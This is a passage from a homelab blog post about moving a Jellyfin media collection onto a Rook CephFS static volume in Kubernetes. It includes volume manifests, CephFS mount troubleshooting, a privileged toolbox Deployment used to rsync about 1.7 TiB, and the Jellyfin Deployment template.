</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;rootPath&#34;: </span><span style="color:#ae81ff">/volumes/static-pvcs/media/9a1f1581-6749-4146-a2aa-251fe2b58eca</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">volumeHandle</span>: <span style="color:#ae81ff">jellyfin-media</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">persistentVolumeReclaimPolicy</span>: <span style="color:#ae81ff">Retain</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">volumeMode</span>: <span style="color:#ae81ff">Filesystem</span>
</span></span></code></pre></div><p>I mostly copied this from another CephFS volume I already had as scratch space
for my backup setup. Important to note here is the <code>spec.csi.volumeAttributes.staticVolume: true</code>
entry as well as the <code>rootPath</code>.
The value for the root path can be found with the following command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ceph fs subvolume getpath homelab-fs media static-pvcs
</span></span></code></pre></div><p>The PersistentVolumeClaim then looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">PersistentVolumeClaim</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">jellyfin-media</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">accessModes</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">ReadWriteMany</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">storage</span>: <span style="color:#ae81ff">1Gi</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">storageClassName</span>: <span style="color:#e6db74">&#34;&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">volumeMode</span>: <span style="color:#ae81ff">Filesystem</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">volumeName</span>: <span style="color:#ae81ff">jellyfin-media</span>
</span></span></code></pre></div><p>Because it&rsquo;s a CephFS subvolume, I could use the ReadWriteMany access mode.</p>
<p>But when trying to launch a Pod using the PVC, I got this error message initially:</p>
<pre tabindex="0"><code>MountVolume.MountDevice failed for volume &#34;jellyfin-media&#34; : rpc error: code = Internal desc = failed to get user credentials from node stage secrets: missing ID field &#39;userID&#39; in secrets
</code></pre><p>This showed up in the Events of the Pod. The issue is mentioned in the <a href="https://rook.io/docs/rook/latest/Storage-Configuration/Shared-Filesystem-CephFS/filesystem-storage/#consume-the-shared-filesystem-across-namespaces">Rook Docs</a>.
And it needs to be solved by manually creating another Secret. I&rsquo;m not sure why
the Ceph CSI driver doesn&rsquo;t automatically create the Secret, as it&rsquo;s just a
copy of the <code>rook-csi-cephfs-node</code> secret with different names for the data keys.</p>
<p>I did the copy by first fetching the <code>rook-csi-cephfs-node</code> secret:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl get -n rook-cluster secrets rook-csi-cephfs-node -o yaml &gt; csi-secret.yaml
</span></span></code></pre></div><p>From that <code>csi-secret.yaml</code> I then removed all of the runtime information added
by Kubernetes and then renamed the keys like this:</p>
<ul>
<li><code>adminID</code> -&gt; <code>userID</code></li>
<li><code>adminKey</code> -&gt; <code>userKey</code></li>
</ul>
<p>After that, I applied the new Secret to the cluster and then changed the
<code>spec.csi.nodeStageSecretRef.name</code> property of the PersistentVolume to the newly
created Secret. After that, the Pod was able to mount the CephFS static volume
without issue.
What I&rsquo;m still wondering about is why these static PVCs need this special
handling, even though CephFS PVCs created dynamically don&rsquo;t.</p>
<p>The last step of the preparation was to make sure that I could also mount the
CephFS subvolume on my desktop machine.
This, quite honestly, involved a bit of silliness. In my current configuration,
I just had the <code>name</code> option set for the mount, giving the Ceph user name to
use for authentication. This then automatically takes the <code>/etc/ceph/ceph.conf</code>
file to get the MON daemon IPs for initial cluster contact and the <code>ceph.client.&lt;username&gt;.keyring</code>
file from the same directory. I couldn&rsquo;t reuse the same approach, because I&rsquo;ve
got other mounts from the baremetal cluster I need to keep for now.</p>
<p>But as per the <a href="https://docs.ceph.com/en/reef/man/8/mount.ceph/">ceph.mount man page</a>,
there is a <code>secretfile</code> option. In my naivete, I thought that this file takes the
path to a keyring file. Which would make sense. Because the keyring files are
the way Ceph credentials are provided everywhere else. But no. The <code>secretfile</code>
option expects a file which contains <em>only</em> the key, and nothing else.
If you provide it with a full keyring file, the mount command will output an
error like this:</p>
<pre tabindex="0"><code>secret is not valid base64: Invalid argument.
adding ceph secret key to kernel failed: Invalid argument
couldn&#39;t append secret option: -22
</code></pre><p>With that finally figured out, I created the Ceph config file for the Rook
cluster with this command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ceph config generate-minimal-conf
</span></span></code></pre></div><p>Then I was able to mount the subvolume with this command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>mount -t ceph :/volumes/static-pvcs/media/9a1f1581-6749-4146-a2aa-251fe2b58eca /mnt/temp -o name<span style="color:#f92672">=</span>myuser,secretfile<span style="color:#f92672">=</span>/etc/ceph/ceph-rook.secret,conf<span style="color:#f92672">=</span>/etc/ceph/ceph-rook.conf
</span></span></code></pre></div><p>What I really like about working with Rook instead of baremetal Ceph is that I
can create additional users with Kubernetes manifests so I can version control
them, instead of having to document long sequences of commands in a runbook:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">ceph.rook.io/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">CephClient</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">myuser</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">caps</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">mds</span>: <span style="color:#e6db74">&#39;allow rw path=/volumes/static-pvcs/media/9a1f1581-6749-4146-a2aa-251fe2b58eca&#39;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">mon</span>: <span style="color:#e6db74">&#39;allow r&#39;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">osd</span>: <span style="color:#e6db74">&#39;allow rw tag cephfs data=homelab-fs&#39;</span>
</span></span></code></pre></div><p>This will allow the user to access only that specific static volume in the
cluster.</p>
<h2 id="copying-the-media-collection">Copying the media collection</h2>
<p>My media collection has a size of about 1.7 TiB. I knew that copying it over
would take quite a while, so I planned to do it from my Command&amp;Control host.
But then I got a weird feeling and decided to check the networking diagram.
It looks something like this:
<figure>
    <img loading="lazy" src="copy-routing.svg"
         alt="This is a network diagram. It shows several hosts: The first two are &#39;Baremetal Ceph Host&#39; and &#39;Rook Ceph Host&#39;. They&#39;re both in the same VLAN. Then there is &#39;Copy Host&#39;, which is connected to a different VLAN. All of them are connected to the same switch. Also connected to that switch is the &#39;Router routing VLANs&#39;. The diagram shows a network flow starting at &#39;Baremetal Ceph Host&#39; and going into the router via the switch. Then from the router it goes over back to the switch to end up in the &#39;Copy Host&#39;. From there, the flow goes back out to the switch and to the router again, to then go back to the switch and end up in the Rook Ceph Host."/> <figcaption>
            <p>Network diagram with the packet flow for the copy operation.</p>
        </figcaption>
</figure>
</p>
<p>The issue here is the fact my C&amp;C host, called the <em>Copy Host</em> here, is in a
different VLAN than the baremetal and Rook Ceph hosts. This means that some
routing needs to happen for packets to get to and from the Ceph hosts to the
copy host. This in turn means that all packets need to pass through the router.
This would be fine if the packets only needed to pass through the router once.
But in truth, they need to pass through the router twice. And they pass through
the same NIC on the router even four times.</p>
<p>The packets go from the source, the baremetal Ceph cluster, up to the router via
the link from the switch. Pass Nr. 1. Then they go down that same link again to
reach the C&amp;C host on its VLAN. Pass Nr. 2. The C&amp;C host then sends it to the
router again, now with the Rook Ceph host as the destination, pass Nr. 3.
And finally, the router then sends the packets back again down that link
between router and switch to finally arrive at the Ceph Rook host.</p>
<p>So because each packet passes the link twice in each direction, my maximum copy
speed is suddenly reduced to 500 Mbit/s, which is a mere 62 MByte/s, slower even
than the HDDs involved in this copy process.</p>
<p>I was contemplating which Homelab host to take out and install the necessary
tools on when <a href="https://hachyderm.io/@badnetmask">@badnetmask</a>, rightly, asked
why I don&rsquo;t just launch a Pod somewhere. And that was what I finally went with.</p>
<p>I then remembered that there is a <a href="https://rook.io/docs/rook/latest-release/Troubleshooting/ceph-toolbox/">Rook Ceph Toolbox</a>
with all the necessary tools already installed and I decided to try that.
After copying the credentials similar to what I explained above for my desktop
mounts, I got an error:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>bash-5.1$ mount -t ceph :/volumes/static-pvcs/media/9a1f1581-6749-4146-a2aa-251fe2b58eca /mnt/rook -o name<span style="color:#f92672">=</span>admin
</span></span><span style="display:flex;"><span>mount: drop permissions failed.
</span></span></code></pre></div><p>I then changed <a href="https://github.com/rook/rook/blob/master/deploy/examples/toolbox.yaml">the Pod&rsquo;s Yaml</a>
a bit by running it as root. Which gave me an error again, but at least a different one:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span><span style="color:#f92672">[</span>root@rook-ceph-tools-584df95dcb-vdwqc /<span style="color:#f92672">]</span><span style="color:#75715e"># mount -t ceph :/volumes/static-pvcs/media/9a1f1581-6749-4146-a2aa-251fe2b58eca /mnt/rook -o name=admin</span>
</span></span><span style="display:flex;"><span>Unable to apply new capability set.
</span></span><span style="display:flex;"><span>modprobe: FATAL: Module ceph not found in directory /lib/modules/5.15.0-131-generic
</span></span><span style="display:flex;"><span>failed to load ceph kernel module <span style="color:#f92672">(</span>1<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>Unable to apply new capability set.
</span></span><span style="display:flex;"><span>unable to determine mon addresses
</span></span></code></pre></div><p>To get rid of the failed attempt to load the Ceph kernel module, I then also
added the <code>/lib/modules</code> directory as a volume to the Pod. This worked and got
rid of the fatal modprobe error, but still left me with the other errors.
So throwing up my hands, I set <code>securityContext.privileged</code>. I&rsquo;m still a bit
surprised that Linux doesn&rsquo;t have a specific capability to add to be allowed to
do mounting? Perhaps the ability to run mount is just so powerful that you&rsquo;ve
got <code>CAP_SYS_ADMIN</code> anyway?</p>
<p>The final Deployment I used:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">apps/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Deployment</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">rook-ceph-tools</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">rook-cluster</span> <span style="color:#75715e"># namespace:cluster</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">replicas</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">selector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">app</span>: <span style="color:#ae81ff">rook-ceph-tools</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">template</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">app</span>: <span style="color:#ae81ff">rook-ceph-tools</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">dnsPolicy</span>: <span style="color:#ae81ff">ClusterFirstWithHostNet</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">serviceAccountName</span>: <span style="color:#ae81ff">rook-ceph-default</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">containers</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">rook-ceph-tools</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">image</span>: <span style="color:#ae81ff">quay.io/ceph/ceph:v18</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">command</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#ae81ff">/bin/bash</span>
</span></span><span style="display:flex;"><span>            - -<span style="color:#ae81ff">c</span>
</span></span><span style="display:flex;"><span>            - |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              CEPH_CONFIG=&#34;/etc/ceph/ceph.conf&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              MON_CONFIG=&#34;/etc/rook/mon-endpoints&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              KEYRING_FILE=&#34;/etc/ceph/keyring&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              write_endpoints() {
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                endpoints=$(cat ${MON_CONFIG})
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                mon_endpoints=$(echo &#34;${endpoints}&#34;| sed &#39;s/[a-z0-9_-]\+=//g&#39;)
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                DATE=$(date)
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                echo &#34;$DATE writing mon endpoints to ${CEPH_CONFIG}: ${endpoints}&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                  cat &lt;&lt;EOF &gt; ${CEPH_CONFIG}
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              [global]
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              mon_host = ${mon_endpoints}
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              [client.admin]
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              keyring = ${KEYRING_FILE}
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              EOF
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              }
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              watch_endpoints() {
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                real_path=$(realpath ${MON_CONFIG})
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                initial_time=$(stat -c %Z &#34;${real_path}&#34;)
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                while true; do
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                  real_path=$(realpath ${MON_CONFIG})
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                  latest_time=$(stat -c %Z &#34;${real_path}&#34;)
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                  if [[ &#34;${latest_time}&#34; != &#34;${initial_time}&#34; ]]; then
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                    write_endpoints
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                    initial_time=${latest_time}
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                  fi
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                  sleep 10
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                done
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              }
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              ceph_secret=${ROOK_CEPH_SECRET}
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              if [[ &#34;$ceph_secret&#34; == &#34;&#34; ]]; then
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                ceph_secret=$(cat /var/lib/rook-ceph-mon/secret.keyring)
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              fi
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              cat &lt;&lt;EOF &gt; ${KEYRING_FILE}
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              [${ROOK_CEPH_USERNAME}]
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              key = ${ceph_secret}
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              EOF
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              write_endpoints
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              watch_endpoints</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">imagePullPolicy</span>: <span style="color:#ae81ff">IfNotPresent</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">tty</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">securityContext</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">runAsNonRoot</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">privileged</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">env</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">ROOK_CEPH_USERNAME</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">rook-ceph-mon</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">key</span>: <span style="color:#ae81ff">ceph-username</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">volumeMounts</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/etc/ceph</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">name</span>: <span style="color:#ae81ff">ceph-config</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">mon-endpoint-volume</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/etc/rook</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">ceph-admin-secret</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/var/lib/rook-ceph-mon</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">readOnly</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">modules</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/lib/modules</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">readOnly</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">volumes</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">ceph-admin-secret</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">secret</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">secretName</span>: <span style="color:#ae81ff">rook-ceph-mon</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">optional</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">items</span>:
</span></span><span style="display:flex;"><span>              - <span style="color:#f92672">key</span>: <span style="color:#ae81ff">ceph-secret</span>
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">path</span>: <span style="color:#ae81ff">secret.keyring</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">mon-endpoint-volume</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">configMap</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">name</span>: <span style="color:#ae81ff">rook-ceph-mon-endpoints</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">items</span>:
</span></span><span style="display:flex;"><span>              - <span style="color:#f92672">key</span>: <span style="color:#ae81ff">data</span>
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">path</span>: <span style="color:#ae81ff">mon-endpoints</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">ceph-config</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">emptyDir</span>: {}
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">modules</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">hostPath</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/lib/modules</span> <span style="color:#75715e"># directory location on host</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tolerations</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;node.kubernetes.io/unreachable&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">operator</span>: <span style="color:#e6db74">&#34;Exists&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">effect</span>: <span style="color:#e6db74">&#34;NoExecute&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">tolerationSeconds</span>: <span style="color:#ae81ff">5</span>
</span></span></code></pre></div><p>Anyway, with the <code>privileged</code> option set, I was finally able to mount. Wanting
to use rsync, I installed it with <code>yum install rsync</code> and mounted the baremetal
and Rook CephFS subvolumes.</p>
<p>I used this command to execute the copy operation:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>rsync -av --info<span style="color:#f92672">=</span>progress2 --info<span style="color:#f92672">=</span>name0 /mnt/baremetal/* /mnt/rook/
</span></span></code></pre></div><p>Here is the final output:</p>
<pre tabindex="0"><code>sent 1,748,055,479,314 bytes  received 155,334 bytes  54,890,039.24 bytes/sec
total size is 1,853,006,549,228  speedup is 1.06
</code></pre><p>The operation took a total of 9.5 h.</p>
<h2 id="deploying-jellyfin">Deploying Jellyfin</h2>
<p>Just for completeness&rsquo; sake, here is the Jellyfin Deployment:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">apps/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Deployment</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">jellyfin</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">replicas</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">selector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">homelab/app</span>: <span style="color:#ae81ff">jellyfin</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">strategy</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">type</span>: <span style="color:#e6db74">&#34;Recreate&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">template</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">homelab/app</span>: <span style="color:#ae81ff">jellyfin</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">securityContext</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">fsGroup</span>: <span style="color:#ae81ff">1006</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">runAsUser</span>: <span style="color:#ae81ff">1007</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">runAsGroup</span>: <span style="color:#ae81ff">1006</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">containers</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">jellyfin</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">image</span>: <span style="color:#ae81ff">jellyfin/jellyfin:{{ .Values.appVersion }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">command</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;/jellyfin/jellyfin&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;--datadir&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;{{ .Values.mounts.cacheAndConf }}/data&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;--cachedir&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;{{ .Values.mounts.cacheAndConf }}/cache&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;--ffmpeg&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;/usr/lib/jellyfin-ffmpeg/ffmpeg&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">volumeMounts</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">cache-and-conf</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: {{ <span style="color:#ae81ff">.Values.mounts.cacheAndConf }}</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">media</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: {{ <span style="color:#ae81ff">.Values.mounts.media }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">1000m</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">1000Mi</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">livenessProbe</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">httpGet</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">port</span>: {{ <span style="color:#ae81ff">.Values.port }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">path</span>: <span style="color:#e6db74">&#34;/health&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">initialDelaySeconds</span>: <span style="color:#ae81ff">15</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">periodSeconds</span>: <span style="color:#ae81ff">30</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">jellyfin-http</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">containerPort</span>: {{ <span style="color:#ae81ff">.Values.port }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
